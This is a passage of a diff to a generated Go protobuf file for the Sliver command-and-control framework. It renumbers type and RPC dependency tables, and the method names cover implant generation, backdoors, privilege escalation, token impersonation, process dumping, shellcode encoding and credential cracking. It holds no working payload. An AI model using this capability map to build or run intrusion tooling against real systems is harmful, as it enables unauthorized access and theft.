+ (*clientpb.ExternalImplantConfig)(nil), // 146: clientpb.ExternalImplantConfig
+ (*clientpb.HTTPC2Configs)(nil), // 147: clientpb.HTTPC2Configs
+ (*clientpb.HTTPC2Config)(nil), // 148: clientpb.HTTPC2Config
+ (*clientpb.Builders)(nil), // 149: clientpb.Builders
+ (*clientpb.CertificateInfo)(nil), // 150: clientpb.CertificateInfo
+ (*clientpb.Crackstations)(nil), // 151: clientpb.Crackstations
+ (*clientpb.CrackFiles)(nil), // 152: clientpb.CrackFiles
+ (*clientpb.ImplantBuilds)(nil), // 153: clientpb.ImplantBuilds
+ (*clientpb.Canaries)(nil), // 154: clientpb.Canaries
+ (*clientpb.WGClientConfig)(nil), // 155: clientpb.WGClientConfig
+ (*clientpb.UniqueWGIP)(nil), // 156: clientpb.UniqueWGIP
+ (*clientpb.ImplantProfiles)(nil), // 157: clientpb.ImplantProfiles
+ (*clientpb.ShellcodeRDI)(nil), // 158: clientpb.ShellcodeRDI
+ (*clientpb.Compiler)(nil), // 159: clientpb.Compiler
+ (*clientpb.ShellcodeEncode)(nil), // 160: clientpb.ShellcodeEncode
+ (*clientpb.ShellcodeEncoderMap)(nil), // 161: clientpb.ShellcodeEncoderMap
+ (*clientpb.TrafficEncoderMap)(nil), // 162: clientpb.TrafficEncoderMap
+ (*clientpb.TrafficEncoderTests)(nil), // 163: clientpb.TrafficEncoderTests
+ (*clientpb.Websites)(nil), // 164: clientpb.Websites
+ (*sliverpb.Ps)(nil), // 165: sliverpb.Ps
+ (*sliverpb.Terminate)(nil), // 166: sliverpb.Terminate
+ (*sliverpb.Ifconfig)(nil), // 167: sliverpb.Ifconfig
+ (*sliverpb.Netstat)(nil), // 168: sliverpb.Netstat
+ (*sliverpb.Ls)(nil), // 169: sliverpb.Ls
+ (*sliverpb.Pwd)(nil), // 170: sliverpb.Pwd
+ (*sliverpb.Mv)(nil), // 171: sliverpb.Mv
+ (*sliverpb.Cp)(nil), // 172: sliverpb.Cp
+ (*sliverpb.Rm)(nil), // 173: sliverpb.Rm
+ (*sliverpb.Mkdir)(nil), // 174: sliverpb.Mkdir
+ (*sliverpb.Download)(nil), // 175: sliverpb.Download
+ (*sliverpb.Upload)(nil), // 176: sliverpb.Upload
+ (*sliverpb.Grep)(nil), // 177: sliverpb.Grep
+ (*sliverpb.Chmod)(nil), // 178: sliverpb.Chmod
+ (*sliverpb.Chown)(nil), // 179: sliverpb.Chown
+ (*sliverpb.Chtimes)(nil), // 180: sliverpb.Chtimes
+ (*sliverpb.MemfilesAdd)(nil), // 181: sliverpb.MemfilesAdd
+ (*sliverpb.MemfilesRm)(nil), // 182: sliverpb.MemfilesRm
+ (*sliverpb.Mount)(nil), // 183: sliverpb.Mount
+ (*sliverpb.ProcessDump)(nil), // 184: sliverpb.ProcessDump
+ (*sliverpb.RunAs)(nil), // 185: sliverpb.RunAs
+ (*sliverpb.Impersonate)(nil), // 186: sliverpb.Impersonate
+ (*sliverpb.RevToSelf)(nil), // 187: sliverpb.RevToSelf
+ (*sliverpb.GetSystem)(nil), // 188: sliverpb.GetSystem
+ (*sliverpb.Task)(nil), // 189: sliverpb.Task
+ (*sliverpb.ExecuteAssembly)(nil), // 190: sliverpb.ExecuteAssembly
+ (*sliverpb.Migrate)(nil), // 191: sliverpb.Migrate
+ (*sliverpb.Execute)(nil), // 192: sliverpb.Execute
+ (*sliverpb.Sideload)(nil), // 193: sliverpb.Sideload
+ (*sliverpb.SpawnDll)(nil), // 194: sliverpb.SpawnDll
+ (*sliverpb.Screenshot)(nil), // 195: sliverpb.Screenshot
+ (*sliverpb.CurrentTokenOwner)(nil), // 196: sliverpb.CurrentTokenOwner
+ (*sliverpb.Services)(nil), // 197: sliverpb.Services
+ (*sliverpb.ServiceDetail)(nil), // 198: sliverpb.ServiceDetail
+ (*sliverpb.ServiceInfo)(nil), // 199: sliverpb.ServiceInfo
+ (*sliverpb.PivotListener)(nil), // 200: sliverpb.PivotListener
+ (*sliverpb.PivotListeners)(nil), // 201: sliverpb.PivotListeners
+ (*clientpb.PivotGraph)(nil), // 202: clientpb.PivotGraph
+ (*sliverpb.MakeToken)(nil), // 203: sliverpb.MakeToken
+ (*sliverpb.EnvInfo)(nil), // 204: sliverpb.EnvInfo
+ (*sliverpb.SetEnv)(nil), // 205: sliverpb.SetEnv
+ (*sliverpb.UnsetEnv)(nil), // 206: sliverpb.UnsetEnv
+ (*clientpb.Backdoor)(nil), // 207: clientpb.Backdoor
+ (*sliverpb.RegistryRead)(nil), // 208: sliverpb.RegistryRead
+ (*sliverpb.RegistryWrite)(nil), // 209: sliverpb.RegistryWrite
+ (*sliverpb.RegistryCreateKey)(nil), // 210: sliverpb.RegistryCreateKey
+ (*sliverpb.RegistryDeleteKey)(nil), // 211: sliverpb.RegistryDeleteKey
+ (*sliverpb.RegistrySubKeyList)(nil), // 212: sliverpb.RegistrySubKeyList
+ (*sliverpb.RegistryValuesList)(nil), // 213: sliverpb.RegistryValuesList
+ (*sliverpb.RegistryReadHive)(nil), // 214: sliverpb.RegistryReadHive
+ (*sliverpb.SSHCommand)(nil), // 215: sliverpb.SSHCommand
+ (*clientpb.DllHijack)(nil), // 216: clientpb.DllHijack
+ (*sliverpb.GetPrivs)(nil), // 217: sliverpb.GetPrivs
+ (*sliverpb.RportFwdListener)(nil), // 218: sliverpb.RportFwdListener
+ (*sliverpb.RportFwdListeners)(nil), // 219: sliverpb.RportFwdListeners
+ (*sliverpb.RegisterExtension)(nil), // 220: sliverpb.RegisterExtension
+ (*sliverpb.CallExtension)(nil), // 221: sliverpb.CallExtension
+ (*sliverpb.ListExtensions)(nil), // 222: sliverpb.ListExtensions
+ (*sliverpb.RegisterWasmExtension)(nil), // 223: sliverpb.RegisterWasmExtension
+ (*sliverpb.ListWasmExtensions)(nil), // 224: sliverpb.ListWasmExtensions
+ (*sliverpb.ExecWasmExtension)(nil), // 225: sliverpb.ExecWasmExtension
+ (*sliverpb.WGPortForward)(nil), // 226: sliverpb.WGPortForward
+ (*sliverpb.WGSocks)(nil), // 227: sliverpb.WGSocks
+ (*sliverpb.WGTCPForwarders)(nil), // 228: sliverpb.WGTCPForwarders
+ (*sliverpb.WGSocksServers)(nil), // 229: sliverpb.WGSocksServers
+ (*sliverpb.Shell)(nil), // 230: sliverpb.Shell
+ (*sliverpb.Portfwd)(nil), // 231: sliverpb.Portfwd
}
var file_rpcpb_services_proto_depIdxs = []int32{
0, // 0: rpcpb.SliverRPC.GetVersion:input_type -> commonpb.Empty
@@ -1044,293 +1038,291 @@ var file_rpcpb_services_proto_depIdxs = []int32{
0, // 76: rpcpb.SliverRPC.ImplantProfiles:input_type -> commonpb.Empty
38, // 77: rpcpb.SliverRPC.DeleteImplantProfile:input_type -> clientpb.DeleteReq
39, // 78: rpcpb.SliverRPC.SaveImplantProfile:input_type -> clientpb.ImplantProfile
- 40, // 79: rpcpb.SliverRPC.MsfStage:input_type -> clientpb.MsfStagerReq
- 41, // 80: rpcpb.SliverRPC.ShellcodeRDI:input_type -> clientpb.ShellcodeRDIReq
- 0, // 81: rpcpb.SliverRPC.GetCompiler:input_type -> commonpb.Empty
- 42, // 82: rpcpb.SliverRPC.ShellcodeEncoder:input_type -> clientpb.ShellcodeEncodeReq
- 0, // 83: rpcpb.SliverRPC.ShellcodeEncoderMap:input_type -> commonpb.Empty
- 0, // 84: rpcpb.SliverRPC.TrafficEncoderMap:input_type -> commonpb.Empty
- 43, // 85: rpcpb.SliverRPC.TrafficEncoderAdd:input_type -> clientpb.TrafficEncoder
- 43, // 86: rpcpb.SliverRPC.TrafficEncoderRm:input_type -> clientpb.TrafficEncoder
- 0, // 87: rpcpb.SliverRPC.Websites:input_type -> commonpb.Empty
- 44, // 88: rpcpb.SliverRPC.Website:input_type -> clientpb.Website
- 44, // 89: rpcpb.SliverRPC.WebsiteRemove:input_type -> clientpb.Website
- 45, // 90: rpcpb.SliverRPC.WebsiteAddContent:input_type -> clientpb.WebsiteAddContent
- 45, // 91: rpcpb.SliverRPC.WebsiteUpdateContent:input_type -> clientpb.WebsiteAddContent
- 46, // 92: rpcpb.SliverRPC.WebsiteRemoveContent:input_type -> clientpb.WebsiteRemoveContent
- 47, // 93: rpcpb.SliverRPC.Ping:input_type -> sliverpb.Ping
- 48, // 94: rpcpb.SliverRPC.Ps:input_type -> sliverpb.PsReq
- 49, // 95: rpcpb.SliverRPC.Terminate:input_type -> sliverpb.TerminateReq
- 50, // 96: rpcpb.SliverRPC.Ifconfig:input_type -> sliverpb.IfconfigReq
- 51, // 97: rpcpb.SliverRPC.Netstat:input_type -> sliverpb.NetstatReq
- 52, // 98: rpcpb.SliverRPC.Ls:input_type -> sliverpb.LsReq
- 53, // 99: rpcpb.SliverRPC.Cd:input_type -> sliverpb.CdReq
- 54, // 100: rpcpb.SliverRPC.Pwd:input_type -> sliverpb.PwdReq
- 55, // 101: rpcpb.SliverRPC.Mv:input_type -> sliverpb.MvReq
- 56, // 102: rpcpb.SliverRPC.Cp:input_type -> sliverpb.CpReq
- 57, // 103: rpcpb.SliverRPC.Rm:input_type -> sliverpb.RmReq
- 58, // 104: rpcpb.SliverRPC.Mkdir:input_type -> sliverpb.MkdirReq
- 59, // 105: rpcpb.SliverRPC.Download:input_type -> sliverpb.DownloadReq
- 60, // 106: rpcpb.SliverRPC.Upload:input_type -> sliverpb.UploadReq
- 61, // 107: rpcpb.SliverRPC.Grep:input_type -> sliverpb.GrepReq
- 62, // 108: rpcpb.SliverRPC.Chmod:input_type -> sliverpb.ChmodReq
- 63, // 109: rpcpb.SliverRPC.Chown:input_type -> sliverpb.ChownReq
- 64, // 110: rpcpb.SliverRPC.Chtimes:input_type -> sliverpb.ChtimesReq
- 65, // 111: rpcpb.SliverRPC.MemfilesList:input_type -> sliverpb.MemfilesListReq
- 66, // 112: rpcpb.SliverRPC.MemfilesAdd:input_type -> sliverpb.MemfilesAddReq
- 67, // 113: rpcpb.SliverRPC.MemfilesRm:input_type -> sliverpb.MemfilesRmReq
- 68, // 114: rpcpb.SliverRPC.Mount:input_type -> sliverpb.MountReq
- 69, // 115: rpcpb.SliverRPC.ProcessDump:input_type -> sliverpb.ProcessDumpReq
- 70, // 116: rpcpb.SliverRPC.RunAs:input_type -> sliverpb.RunAsReq
- 71, // 117: rpcpb.SliverRPC.Impersonate:input_type -> sliverpb.ImpersonateReq
- 72, // 118: rpcpb.SliverRPC.RevToSelf:input_type -> sliverpb.RevToSelfReq
- 73, // 119: rpcpb.SliverRPC.GetSystem:input_type -> clientpb.GetSystemReq
- 74, // 120: rpcpb.SliverRPC.Task:input_type -> sliverpb.TaskReq
- 75, // 121: rpcpb.SliverRPC.Msf:input_type -> clientpb.MSFReq
- 76, // 122: rpcpb.SliverRPC.MsfRemote:input_type -> clientpb.MSFRemoteReq
- 77, // 123: rpcpb.SliverRPC.ExecuteAssembly:input_type -> sliverpb.ExecuteAssemblyReq
- 78, // 124: rpcpb.SliverRPC.Migrate:input_type -> clientpb.MigrateReq
- 79, // 125: rpcpb.SliverRPC.Execute:input_type -> sliverpb.ExecuteReq
- 80, // 126: rpcpb.SliverRPC.ExecuteWindows:input_type -> sliverpb.ExecuteWindowsReq
- 81, // 127: rpcpb.SliverRPC.Sideload:input_type -> sliverpb.SideloadReq
- 82, // 128: rpcpb.SliverRPC.SpawnDll:input_type -> sliverpb.InvokeSpawnDllReq
- 83, // 129: rpcpb.SliverRPC.Screenshot:input_type -> sliverpb.ScreenshotReq
- 84, // 130: rpcpb.SliverRPC.CurrentTokenOwner:input_type -> sliverpb.CurrentTokenOwnerReq
- 85, // 131: rpcpb.SliverRPC.Services:input_type -> sliverpb.ServicesReq
- 86, // 132: rpcpb.SliverRPC.ServiceDetail:input_type -> sliverpb.ServiceDetailReq
- 87, // 133: rpcpb.SliverRPC.StartServiceByName:input_type -> sliverpb.StartServiceByNameReq
- 88, // 134: rpcpb.SliverRPC.PivotStartListener:input_type -> sliverpb.PivotStartListenerReq
- 89, // 135: rpcpb.SliverRPC.PivotStopListener:input_type -> sliverpb.PivotStopListenerReq
- 90, // 136: rpcpb.SliverRPC.PivotSessionListeners:input_type -> sliverpb.PivotListenersReq
- 0, // 137: rpcpb.SliverRPC.PivotGraph:input_type -> commonpb.Empty
- 91, // 138: rpcpb.SliverRPC.StartService:input_type -> sliverpb.StartServiceReq
- 92, // 139: rpcpb.SliverRPC.StopService:input_type -> sliverpb.StopServiceReq
- 93, // 140: rpcpb.SliverRPC.RemoveService:input_type -> sliverpb.RemoveServiceReq
- 94, // 141: rpcpb.SliverRPC.MakeToken:input_type -> sliverpb.MakeTokenReq
- 95, // 142: rpcpb.SliverRPC.GetEnv:input_type -> sliverpb.EnvReq
- 96, // 143: rpcpb.SliverRPC.SetEnv:input_type -> sliverpb.SetEnvReq
- 97, // 144: rpcpb.SliverRPC.UnsetEnv:input_type -> sliverpb.UnsetEnvReq
- 98, // 145: rpcpb.SliverRPC.Backdoor:input_type -> clientpb.BackdoorReq
- 99, // 146: rpcpb.SliverRPC.RegistryRead:input_type -> sliverpb.RegistryReadReq
- 100, // 147: rpcpb.SliverRPC.RegistryWrite:input_type -> sliverpb.RegistryWriteReq
- 101, // 148: rpcpb.SliverRPC.RegistryCreateKey:input_type -> sliverpb.RegistryCreateKeyReq
- 102, // 149: rpcpb.SliverRPC.RegistryDeleteKey:input_type -> sliverpb.RegistryDeleteKeyReq
- 103, // 150: rpcpb.SliverRPC.RegistryListSubKeys:input_type -> sliverpb.RegistrySubKeyListReq
- 104, // 151: rpcpb.SliverRPC.RegistryListValues:input_type -> sliverpb.RegistryListValuesReq
- 105, // 152: rpcpb.SliverRPC.RegistryReadHive:input_type -> sliverpb.RegistryReadHiveReq
- 106, // 153: rpcpb.SliverRPC.RunSSHCommand:input_type -> sliverpb.SSHCommandReq
- 107, // 154: rpcpb.SliverRPC.HijackDLL:input_type -> clientpb.DllHijackReq
- 108, // 155: rpcpb.SliverRPC.GetPrivs:input_type -> sliverpb.GetPrivsReq
- 109, // 156: rpcpb.SliverRPC.StartRportFwdListener:input_type -> sliverpb.RportFwdStartListenerReq
- 110, // 157: rpcpb.SliverRPC.GetRportFwdListeners:input_type -> sliverpb.RportFwdListenersReq
- 111, // 158: rpcpb.SliverRPC.StopRportFwdListener:input_type -> sliverpb.RportFwdStopListenerReq
- 112, // 159: rpcpb.SliverRPC.OpenSession:input_type -> sliverpb.OpenSession
- 113, // 160: rpcpb.SliverRPC.CloseSession:input_type -> sliverpb.CloseSession
- 114, // 161: rpcpb.SliverRPC.RegisterExtension:input_type -> sliverpb.RegisterExtensionReq
- 115, // 162: rpcpb.SliverRPC.CallExtension:input_type -> sliverpb.CallExtensionReq
- 116, // 163: rpcpb.SliverRPC.ListExtensions:input_type -> sliverpb.ListExtensionsReq
- 117, // 164: rpcpb.SliverRPC.RegisterWasmExtension:input_type -> sliverpb.RegisterWasmExtensionReq
- 118, // 165: rpcpb.SliverRPC.ListWasmExtensions:input_type -> sliverpb.ListWasmExtensionsReq
- 119, // 166: rpcpb.SliverRPC.ExecWasmExtension:input_type -> sliverpb.ExecWasmExtensionReq
- 120, // 167: rpcpb.SliverRPC.WGStartPortForward:input_type -> sliverpb.WGPortForwardStartReq
- 121, // 168: rpcpb.SliverRPC.WGStopPortForward:input_type -> sliverpb.WGPortForwardStopReq
- 122, // 169: rpcpb.SliverRPC.WGStartSocks:input_type -> sliverpb.WGSocksStartReq
- 123, // 170: rpcpb.SliverRPC.WGStopSocks:input_type -> sliverpb.WGSocksStopReq
- 124, // 171: rpcpb.SliverRPC.WGListForwarders:input_type -> sliverpb.WGTCPForwardersReq
- 125, // 172: rpcpb.SliverRPC.WGListSocksServers:input_type -> sliverpb.WGSocksServersReq
- 126, // 173: rpcpb.SliverRPC.Shell:input_type -> sliverpb.ShellReq
- 127, // 174: rpcpb.SliverRPC.Portfwd:input_type -> sliverpb.PortfwdReq
- 128, // 175: rpcpb.SliverRPC.CreateSocks:input_type -> sliverpb.Socks
- 128, // 176: rpcpb.SliverRPC.CloseSocks:input_type -> sliverpb.Socks
- 129, // 177: rpcpb.SliverRPC.SocksProxy:input_type -> sliverpb.SocksData
- 130, // 178: rpcpb.SliverRPC.CreateTunnel:input_type -> sliverpb.Tunnel
- 130, // 179: rpcpb.SliverRPC.CloseTunnel:input_type -> sliverpb.Tunnel
- 131, // 180: rpcpb.SliverRPC.TunnelData:input_type -> sliverpb.TunnelData
- 0, // 181: rpcpb.SliverRPC.Events:input_type -> commonpb.Empty
- 132, // 182: rpcpb.SliverRPC.GetVersion:output_type -> clientpb.Version
- 0, // 183: rpcpb.SliverRPC.ClientLog:output_type -> commonpb.Empty
- 133, // 184: rpcpb.SliverRPC.GetOperators:output_type -> clientpb.Operators
- 0, // 185: rpcpb.SliverRPC.Kill:output_type -> commonpb.Empty
- 134, // 186: rpcpb.SliverRPC.Reconfigure:output_type -> sliverpb.Reconfigure
- 0, // 187: rpcpb.SliverRPC.Rename:output_type -> commonpb.Empty
- 135, // 188: rpcpb.SliverRPC.GetSessions:output_type -> clientpb.Sessions
- 136, // 189: rpcpb.SliverRPC.MonitorStart:output_type -> commonpb.Response
- 0, // 190: rpcpb.SliverRPC.MonitorStop:output_type -> commonpb.Empty
- 137, // 191: rpcpb.SliverRPC.MonitorListConfig:output_type -> clientpb.MonitoringProviders
- 136, // 192: rpcpb.SliverRPC.MonitorAddConfig:output_type -> commonpb.Response
- 136, // 193: rpcpb.SliverRPC.MonitorDelConfig:output_type -> commonpb.Response
- 138, // 194: rpcpb.SliverRPC.StartMTLSListener:output_type -> clientpb.ListenerJob
- 138, // 195: rpcpb.SliverRPC.StartWGListener:output_type -> clientpb.ListenerJob
- 138, // 196: rpcpb.SliverRPC.StartDNSListener:output_type -> clientpb.ListenerJob
- 138, // 197: rpcpb.SliverRPC.StartHTTPSListener:output_type -> clientpb.ListenerJob
- 138, // 198: rpcpb.SliverRPC.StartHTTPListener:output_type -> clientpb.ListenerJob
- 139, // 199: rpcpb.SliverRPC.GetBeacons:output_type -> clientpb.Beacons
- 10, // 200: rpcpb.SliverRPC.GetBeacon:output_type -> clientpb.Beacon
- 0, // 201: rpcpb.SliverRPC.RmBeacon:output_type -> commonpb.Empty
- 140, // 202: rpcpb.SliverRPC.GetBeaconTasks:output_type -> clientpb.BeaconTasks
- 11, // 203: rpcpb.SliverRPC.GetBeaconTaskContent:output_type -> clientpb.BeaconTask
- 11, // 204: rpcpb.SliverRPC.CancelBeaconTask:output_type -> clientpb.BeaconTask
- 0, // 205: rpcpb.SliverRPC.UpdateBeaconIntegrityInformation:output_type -> commonpb.Empty
- 141, // 206: rpcpb.SliverRPC.GetJobs:output_type -> clientpb.Jobs
- 142, // 207: rpcpb.SliverRPC.KillJob:output_type -> clientpb.KillJob
- 0, // 208: rpcpb.SliverRPC.RestartJobs:output_type -> commonpb.Empty
- 143, // 209: rpcpb.SliverRPC.StartTCPStagerListener:output_type -> clientpb.StagerListener
- 16, // 210: rpcpb.SliverRPC.LootAdd:output_type -> clientpb.Loot
- 0, // 211: rpcpb.SliverRPC.LootRm:output_type -> commonpb.Empty
- 16, // 212: rpcpb.SliverRPC.LootUpdate:output_type -> clientpb.Loot
- 16, // 213: rpcpb.SliverRPC.LootContent:output_type -> clientpb.Loot
- 144, // 214: rpcpb.SliverRPC.LootAll:output_type -> clientpb.AllLoot
- 17, // 215: rpcpb.SliverRPC.Creds:output_type -> clientpb.Credentials
- 0, // 216: rpcpb.SliverRPC.CredsAdd:output_type -> commonpb.Empty
- 0, // 217: rpcpb.SliverRPC.CredsRm:output_type -> commonpb.Empty
- 0, // 218: rpcpb.SliverRPC.CredsUpdate:output_type -> commonpb.Empty
- 18, // 219: rpcpb.SliverRPC.GetCredByID:output_type -> clientpb.Credential
- 17, // 220: rpcpb.SliverRPC.GetCredsByHashType:output_type -> clientpb.Credentials
- 17, // 221: rpcpb.SliverRPC.GetPlaintextCredsByHashType:output_type -> clientpb.Credentials
- 18, // 222: rpcpb.SliverRPC.CredsSniffHashType:output_type -> clientpb.Credential
- 145, // 223: rpcpb.SliverRPC.Hosts:output_type -> clientpb.AllHosts
- 19, // 224: rpcpb.SliverRPC.Host:output_type -> clientpb.Host
- 0, // 225: rpcpb.SliverRPC.HostRm:output_type -> commonpb.Empty
- 0, // 226: rpcpb.SliverRPC.HostIOCRm:output_type -> commonpb.Empty
- 146, // 227: rpcpb.SliverRPC.Generate:output_type -> clientpb.Generate
- 147, // 228: rpcpb.SliverRPC.GenerateExternal:output_type -> clientpb.ExternalImplantConfig
- 0, // 229: rpcpb.SliverRPC.GenerateExternalSaveBuild:output_type -> commonpb.Empty
- 147, // 230: rpcpb.SliverRPC.GenerateExternalGetBuildConfig:output_type -> clientpb.ExternalImplantConfig
- 146, // 231: rpcpb.SliverRPC.GenerateStage:output_type -> clientpb.Generate
- 0, // 232: rpcpb.SliverRPC.StageImplantBuild:output_type -> commonpb.Empty
- 148, // 233: rpcpb.SliverRPC.GetHTTPC2Profiles:output_type -> clientpb.HTTPC2Configs
- 149, // 234: rpcpb.SliverRPC.GetHTTPC2ProfileByName:output_type -> clientpb.HTTPC2Config
- 0, // 235: rpcpb.SliverRPC.SaveHTTPC2Profile:output_type -> commonpb.Empty
- 30, // 236: rpcpb.SliverRPC.BuilderRegister:output_type -> clientpb.Event
- 0, // 237: rpcpb.SliverRPC.BuilderTrigger:output_type -> commonpb.Empty
- 150, // 238: rpcpb.SliverRPC.Builders:output_type -> clientpb.Builders
- 151, // 239: rpcpb.SliverRPC.GetCertificateInfo:output_type -> clientpb.CertificateInfo
- 30, // 240: rpcpb.SliverRPC.CrackstationRegister:output_type -> clientpb.Event
- 0, // 241: rpcpb.SliverRPC.CrackstationTrigger:output_type -> commonpb.Empty
- 0, // 242: rpcpb.SliverRPC.CrackstationBenchmark:output_type -> commonpb.Empty
- 152, // 243: rpcpb.SliverRPC.Crackstations:output_type -> clientpb.Crackstations
- 34, // 244: rpcpb.SliverRPC.CrackTaskByID:output_type -> clientpb.CrackTask
- 0, // 245: rpcpb.SliverRPC.CrackTaskUpdate:output_type -> commonpb.Empty
- 153, // 246: rpcpb.SliverRPC.CrackFilesList:output_type -> clientpb.CrackFiles
- 35, // 247: rpcpb.SliverRPC.CrackFileCreate:output_type -> clientpb.CrackFile
- 0, // 248: rpcpb.SliverRPC.CrackFileChunkUpload:output_type -> commonpb.Empty
- 36, // 249: rpcpb.SliverRPC.CrackFileChunkDownload:output_type -> clientpb.CrackFileChunk
- 0, // 250: rpcpb.SliverRPC.CrackFileComplete:output_type -> commonpb.Empty
- 0, // 251: rpcpb.SliverRPC.CrackFileDelete:output_type -> commonpb.Empty
- 146, // 252: rpcpb.SliverRPC.Regenerate:output_type -> clientpb.Generate
- 154, // 253: rpcpb.SliverRPC.ImplantBuilds:output_type -> clientpb.ImplantBuilds
- 0, // 254: rpcpb.SliverRPC.DeleteImplantBuild:output_type -> commonpb.Empty
- 155, // 255: rpcpb.SliverRPC.Canaries:output_type -> clientpb.Canaries
- 156, // 256: rpcpb.SliverRPC.GenerateWGClientConfig:output_type -> clientpb.WGClientConfig
- 157, // 257: rpcpb.SliverRPC.GenerateUniqueIP:output_type -> clientpb.UniqueWGIP
- 158, // 258: rpcpb.SliverRPC.ImplantProfiles:output_type -> clientpb.ImplantProfiles
- 0, // 259: rpcpb.SliverRPC.DeleteImplantProfile:output_type -> commonpb.Empty
- 39, // 260: rpcpb.SliverRPC.SaveImplantProfile:output_type -> clientpb.ImplantProfile
- 159, // 261: rpcpb.SliverRPC.MsfStage:output_type -> clientpb.MsfStager
- 160, // 262: rpcpb.SliverRPC.ShellcodeRDI:output_type -> clientpb.ShellcodeRDI
- 161, // 263: rpcpb.SliverRPC.GetCompiler:output_type -> clientpb.Compiler
- 162, // 264: rpcpb.SliverRPC.ShellcodeEncoder:output_type -> clientpb.ShellcodeEncode
- 163, // 265: rpcpb.SliverRPC.ShellcodeEncoderMap:output_type -> clientpb.ShellcodeEncoderMap
- 164, // 266: rpcpb.SliverRPC.TrafficEncoderMap:output_type -> clientpb.TrafficEncoderMap
- 165, // 267: rpcpb.SliverRPC.TrafficEncoderAdd:output_type -> clientpb.TrafficEncoderTests
- 0, // 268: rpcpb.SliverRPC.TrafficEncoderRm:output_type -> commonpb.Empty
- 166, // 269: rpcpb.SliverRPC.Websites:output_type -> clientpb.Websites
- 44, // 270: rpcpb.SliverRPC.Website:output_type -> clientpb.Website
- 0, // 271: rpcpb.SliverRPC.WebsiteRemove:output_type -> commonpb.Empty
- 44, // 272: rpcpb.SliverRPC.WebsiteAddContent:output_type -> clientpb.Website
- 44, // 273: rpcpb.SliverRPC.WebsiteUpdateContent:output_type -> clientpb.Website
- 44, // 274: rpcpb.SliverRPC.WebsiteRemoveContent:output_type -> clientpb.Website
- 47, // 275: rpcpb.SliverRPC.Ping:output_type -> sliverpb.Ping
- 167, // 276: rpcpb.SliverRPC.Ps:output_type -> sliverpb.Ps
- 168, // 277: rpcpb.SliverRPC.Terminate:output_type -> sliverpb.Terminate
- 169, // 278: rpcpb.SliverRPC.Ifconfig:output_type -> sliverpb.Ifconfig
- 170, // 279: rpcpb.SliverRPC.Netstat:output_type -> sliverpb.Netstat
- 171, // 280: rpcpb.SliverRPC.Ls:output_type -> sliverpb.Ls
- 172, // 281: rpcpb.SliverRPC.Cd:output_type -> sliverpb.Pwd
- 172, // 282: rpcpb.SliverRPC.Pwd:output_type -> sliverpb.Pwd
- 173, // 283: rpcpb.SliverRPC.Mv:output_type -> sliverpb.Mv
- 174, // 284: rpcpb.SliverRPC.Cp:output_type -> sliverpb.Cp
- 175, // 285: rpcpb.SliverRPC.Rm:output_type -> sliverpb.Rm
- 176, // 286: rpcpb.SliverRPC.Mkdir:output_type -> sliverpb.Mkdir
- 177, // 287: rpcpb.SliverRPC.Download:output_type -> sliverpb.Download
- 178, // 288: rpcpb.SliverRPC.Upload:output_type -> sliverpb.Upload
- 179, // 289: rpcpb.SliverRPC.Grep:output_type -> sliverpb.Grep
- 180, // 290: rpcpb.SliverRPC.Chmod:output_type -> sliverpb.Chmod
- 181, // 291: rpcpb.SliverRPC.Chown:output_type -> sliverpb.Chown
- 182, // 292: rpcpb.SliverRPC.Chtimes:output_type -> sliverpb.Chtimes
- 171, // 293: rpcpb.SliverRPC.MemfilesList:output_type -> sliverpb.Ls
- 183, // 294: rpcpb.SliverRPC.MemfilesAdd:output_type -> sliverpb.MemfilesAdd
- 184, // 295: rpcpb.SliverRPC.MemfilesRm:output_type -> sliverpb.MemfilesRm
- 185, // 296: rpcpb.SliverRPC.Mount:output_type -> sliverpb.Mount
- 186, // 297: rpcpb.SliverRPC.ProcessDump:output_type -> sliverpb.ProcessDump
- 187, // 298: rpcpb.SliverRPC.RunAs:output_type -> sliverpb.RunAs
- 188, // 299: rpcpb.SliverRPC.Impersonate:output_type -> sliverpb.Impersonate
- 189, // 300: rpcpb.SliverRPC.RevToSelf:output_type -> sliverpb.RevToSelf
- 190, // 301: rpcpb.SliverRPC.GetSystem:output_type -> sliverpb.GetSystem
- 191, // 302: rpcpb.SliverRPC.Task:output_type -> sliverpb.Task
- 191, // 303: rpcpb.SliverRPC.Msf:output_type -> sliverpb.Task
- 191, // 304: rpcpb.SliverRPC.MsfRemote:output_type -> sliverpb.Task
- 192, // 305: rpcpb.SliverRPC.ExecuteAssembly:output_type -> sliverpb.ExecuteAssembly
- 193, // 306: rpcpb.SliverRPC.Migrate:output_type -> sliverpb.Migrate
- 194, // 307: rpcpb.SliverRPC.Execute:output_type -> sliverpb.Execute
- 194, // 308: rpcpb.SliverRPC.ExecuteWindows:output_type -> sliverpb.Execute
- 195, // 309: rpcpb.SliverRPC.Sideload:output_type -> sliverpb.Sideload
- 196, // 310: rpcpb.SliverRPC.SpawnDll:output_type -> sliverpb.SpawnDll
- 197, // 311: rpcpb.SliverRPC.Screenshot:output_type -> sliverpb.Screenshot
- 198, // 312: rpcpb.SliverRPC.CurrentTokenOwner:output_type -> sliverpb.CurrentTokenOwner
- 199, // 313: rpcpb.SliverRPC.Services:output_type -> sliverpb.Services
- 200, // 314: rpcpb.SliverRPC.ServiceDetail:output_type -> sliverpb.ServiceDetail
- 201, // 315: rpcpb.SliverRPC.StartServiceByName:output_type -> sliverpb.ServiceInfo
- 202, // 316: rpcpb.SliverRPC.PivotStartListener:output_type -> sliverpb.PivotListener
- 0, // 317: rpcpb.SliverRPC.PivotStopListener:output_type -> commonpb.Empty
- 203, // 318: rpcpb.SliverRPC.PivotSessionListeners:output_type -> sliverpb.PivotListeners
- 204, // 319: rpcpb.SliverRPC.PivotGraph:output_type -> clientpb.PivotGraph
- 201, // 320: rpcpb.SliverRPC.StartService:output_type -> sliverpb.ServiceInfo
- 201, // 321: rpcpb.SliverRPC.StopService:output_type -> sliverpb.ServiceInfo
- 201, // 322: rpcpb.SliverRPC.RemoveService:output_type -> sliverpb.ServiceInfo
- 205, // 323: rpcpb.SliverRPC.MakeToken:output_type -> sliverpb.MakeToken
- 206, // 324: rpcpb.SliverRPC.GetEnv:output_type -> sliverpb.EnvInfo
- 207, // 325: rpcpb.SliverRPC.SetEnv:output_type -> sliverpb.SetEnv
- 208, // 326: rpcpb.SliverRPC.UnsetEnv:output_type -> sliverpb.UnsetEnv
- 209, // 327: rpcpb.SliverRPC.Backdoor:output_type -> clientpb.Backdoor
- 210, // 328: rpcpb.SliverRPC.RegistryRead:output_type -> sliverpb.RegistryRead
- 211, // 329: rpcpb.SliverRPC.RegistryWrite:output_type -> sliverpb.RegistryWrite
- 212, // 330: rpcpb.SliverRPC.RegistryCreateKey:output_type -> sliverpb.RegistryCreateKey
